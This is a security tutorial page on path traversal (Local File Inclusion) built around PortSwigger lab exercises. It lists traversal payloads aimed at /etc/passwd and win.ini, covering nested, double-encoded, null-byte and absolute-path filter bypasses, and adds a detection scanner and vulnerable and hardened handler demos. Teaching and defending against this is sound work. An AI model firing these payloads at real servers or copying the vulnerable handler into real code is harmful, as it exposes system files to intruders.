Local File Inclusion

PRACTICE ! PRACTICE ! PRACTICE !

Last updated 2 years ago

Suppose, for example, that a website renders an image through an application running in the backend.

Usually images are loaded for rendering via an HTML tag such as the one below:

<img src="/loadImage?filename=akash.png">

The loadImage endpoint takes a filename parameter and returns the content of the specified file.

On Linux, the images are stored on a persistent disk under /var/www/images by default.

Sample examples of Linux- and Windows-based LFI exploits:

https://example.com/loadImage?filename=../../../etc/passwd
https://example.com/loadImage?filename=..\..\..\windows\win.ini
Basic PortSwigger Exercises

1. Absolute Path Name

Now when we try the dots-and-slashes sequence, we get a 404 error saying the file is not found. This means the application running in the backend strips or blocks directory traversal sequences from the user-supplied filename, such as:

loadImage?filename=/var/www/images/../../../etc/passwd

It blocks the dot sequence but not the path itself, which makes it even easier to exploit: just supply the exact filesystem path, such as /etc/passwd.

2. Nested Traversal Sequence

If the previous two methods don't work, we can try a nested traversal sequence of dots and slashes:

....// or ....\/

which collapses back into a plain traversal sequence once the backend strips the inner ../ sequence.

NOTE => The sequence must reduce to two dots and a slash after the inner part is stripped.

loadImage?filename=....//....//....//etc/passwd
loadImage?filename=....\/....\/....\/etc/passwd

3. Double Encoding the Sequence

If none of the above methods work, we will have to encode our traversal payload.

The application strips the directory traversal sequence from the filename parameter of a multipart/form-data request before passing it to the backend, and then performs a URL-decode of the input before using it.

To bypass this kind of sanitization, we can double-encode our characters:

%2e%2e%2f => Single encode
%252e%252e%252f => Double encode

Various non-standard encodings, such as ..%c0%af or ..%ef%bc%8f, may also work in some cases.
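The same sequences (nested dots, single and double percent-encoding, the overlong UTF-8 slash variants, and the null-byte and base-folder forms covered later on this page) are what a defender has to undo before a log rule can catch them. The following is an added example, not code from this page or from PortSwigger: a small scanner that normalises the filename parameter from constructed access-log lines and flags traversal indicators. The log lines, the three-round decode limit and the classification rules are assumptions.

```python
"""Scan constructed access-log lines for path-traversal attempts in the
filename parameter.  Added example, not the page's code: the log lines,
decode-round limit and classification rules are assumptions."""
import re
from urllib.parse import unquote

# Constructed log lines (common log format); the payload shapes are the ones shown on this page.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /loadImage?filename=akash.png HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /loadImage?filename=../../../etc/passwd HTTP/1.1" 404 12
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /loadImage?filename=....//....//....//etc/passwd HTTP/1.1" 200 1837
203.0.113.5 - - [10/Oct/2023:13:55:49 +0000] "GET /loadImage?filename=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1837
203.0.113.5 - - [10/Oct/2023:13:55:52 +0000] "GET /loadImage?filename=..%c0%af..%c0%afetc/passwd HTTP/1.1" 200 1837
203.0.113.5 - - [10/Oct/2023:13:55:55 +0000] "GET /loadImage?filename=/var/www/images/../../../etc/passwd HTTP/1.1" 200 1837
203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /loadImage?filename=../../../etc/passwd%00.png HTTP/1.1" 200 1837
203.0.113.5 - - [10/Oct/2023:13:56:05 +0000] "GET /loadImage?filename=..\\..\\..\\windows\\win.ini HTTP/1.1" 404 12
198.51.100.7 - - [10/Oct/2023:13:56:10 +0000] "GET /loadImage?filename=team..photo.png HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Overlong (%c0%af, %e0%80%af) and full-width (%ef%bc%8f) encodings of '/'.
OVERLONG_SLASH = re.compile(r"%c0%af|%e0%80%af|%ef%bc%8f", re.IGNORECASE)


def decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding, mapping the overlong and
    full-width slash encodings to '/', and normalise backslashes to '/'."""
    for _ in range(rounds):
        decoded = unquote(OVERLONG_SLASH.sub("/", value))
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def classify(filename):
    """Return the traversal indicators found in a raw filename value ([] if clean)."""
    norm = decode(filename)
    reasons = []
    if "\x00" in norm:
        reasons.append("null byte")
        norm = norm.split("\x00", 1)[0]      # what a NUL-terminating backend would actually open
    if norm.startswith("/") or re.match(r"[A-Za-z]:", norm):
        reasons.append("absolute path")
    if any(len(seg) >= 2 and set(seg) == {"."} for seg in norm.split("/")):
        reasons.append("dot-only segment")   # catches '..' and the nested '....' form alike
    return reasons


def raw_query_values(target, name):
    """Yield still-encoded values of query parameter `name`.  parse_qs is avoided
    so decoding layers can be counted and %c0%af is not turned into U+FFFD first."""
    _, _, query = target.partition("?")
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            yield value


def scan(log_text):
    """Return [(ip, raw_filename, reasons)] for every request that looks like traversal."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for value in raw_query_values(m["target"], "filename"):
            reasons = classify(value)
            if reasons:
                hits.append((m["ip"], value, reasons))
    return hits


if __name__ == "__main__":
    for ip, value, reasons in scan(SAMPLE_LOG):
        print(f"{ip:14} {', '.join(reasons):30} {value}")
```

The rule works on the decoded, slash-normalised value rather than on the raw bytes, which is why a legitimate name such as team..photo.png is not flagged while every encoded or nested variant of ../ is. Decoding is bounded to a fixed number of rounds so that a crafted value cannot keep the scanner looping.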

4. Using the Base Folder's Path

If the application only checks that the supplied path starts with the expected base folder, prefixing the traversal sequence with that folder passes the check:

https://example.com/loadImage?filename=/var/www/images/../../../etc/passwd

5. File Path Traversal via NULL Byte

If the backend validates the user-supplied input against a required file extension, we use the NULL byte %00 to terminate the file path before the required extension:

filename=../../../etc/passwd%00.png
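To see why sections 1 to 5 work against sequence-stripping and why a canonical-path check does not have the same gaps, here is an added example (not the page's code, and not from PortSwigger) with three versions of the loadImage handler run against a constructed image store. The temporary directories, file contents and function names are assumptions; a sibling private/secret.txt stands in for /etc/passwd so the demo runs anywhere.

```python
"""Vulnerable, strip-filtered and hardened versions of the page's loadImage
handler, run against a constructed image store.  Added example, not the page's
code: the temp directories, file contents and function names are assumptions,
and a sibling "private/secret.txt" stands in for /etc/passwd."""
import os
import tempfile
from urllib.parse import quote, unquote

IMAGE = b"png-bytes"
SECRET = b"top-secret"


def make_store():
    """Create <root>/images/akash.png and <root>/private/secret.txt; return (base, secret_path)."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    base = os.path.join(root, "images")
    os.mkdir(base)
    with open(os.path.join(base, "akash.png"), "wb") as f:
        f.write(IMAGE)
    os.mkdir(os.path.join(root, "private"))
    secret = os.path.join(root, "private", "secret.txt")
    with open(secret, "wb") as f:
        f.write(SECRET)
    return base, secret


def load_vulnerable(base, filename):
    """No validation: '../' walks out of base, and os.path.join drops base
    entirely when filename is absolute (section 1 on the page)."""
    with open(os.path.join(base, filename), "rb") as f:
        return f.read()


def load_strip_filter(base, filename):
    """The sanitiser the page describes: strip '../' once, then URL-decode
    again before use.  The framework has already decoded the query string
    once, so a double-encoded value reaches this function single-encoded."""
    cleaned = unquote(filename.replace("../", ""))
    with open(os.path.join(base, cleaned), "rb") as f:
        return f.read()


def load_hardened(base, filename):
    """Decide on where the path resolves, not on which characters it holds:
    canonicalise base and target, then require target to stay under base."""
    if "\x00" in filename:
        raise PermissionError("null byte in filename")
    root = os.path.realpath(base)
    target = os.path.realpath(os.path.join(root, filename))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError("path resolves outside the image directory")
    with open(target, "rb") as f:
        return f.read()


def outcome(handler, base, filename):
    """Summarise one request as 'served:<content>' or 'rejected:<exception>'."""
    try:
        return "served:" + handler(base, filename).decode()
    except (OSError, ValueError) as exc:  # ValueError: Python's open() refuses an embedded NUL
        return "rejected:" + type(exc).__name__


def run_demo():
    """Return {case: (vulnerable, strip_filter, hardened)} for the page's payload shapes."""
    base, secret = make_store()
    rel = os.path.relpath(secret, base)            # "../private/secret.txt"
    cases = {
        "legit": "akash.png",
        "traversal": rel,                          # plain ../ sequence
        "absolute": secret,                        # section 1: absolute path
        "nested": rel.replace("../", "....//"),    # section 2: survives one '../' strip
        "double_encoded": quote(rel, safe=""),     # section 3: value after the framework's single decode
        "null_byte": rel + "\x00.png",             # section 5: NUL before a required extension
    }
    handlers = (load_vulnerable, load_strip_filter, load_hardened)
    return {name: tuple(outcome(h, base, fn) for h in handlers) for name, fn in cases.items()}


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name:15} vulnerable={result[0]:28} strip={result[1]:28} hardened={result[2]}")
```

The strip filter is the interesting column: it stops the plain ../ sequence but serves the secret for the absolute, nested and double-encoded cases, exactly the bypasses in sections 1 to 3. The hardened handler never strips anything; it resolves the final path with os.path.realpath and checks the prefix with os.path.commonpath, so every escaping variant ends in PermissionError and a malformed-but-contained name simply fails with FileNotFoundError. The null-byte case is rejected in all three columns only because Python's open() refuses embedded NULs; a backend in a language that truncates at NUL would need the explicit check shown in load_hardened.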
Advanced PortSwigger Exercises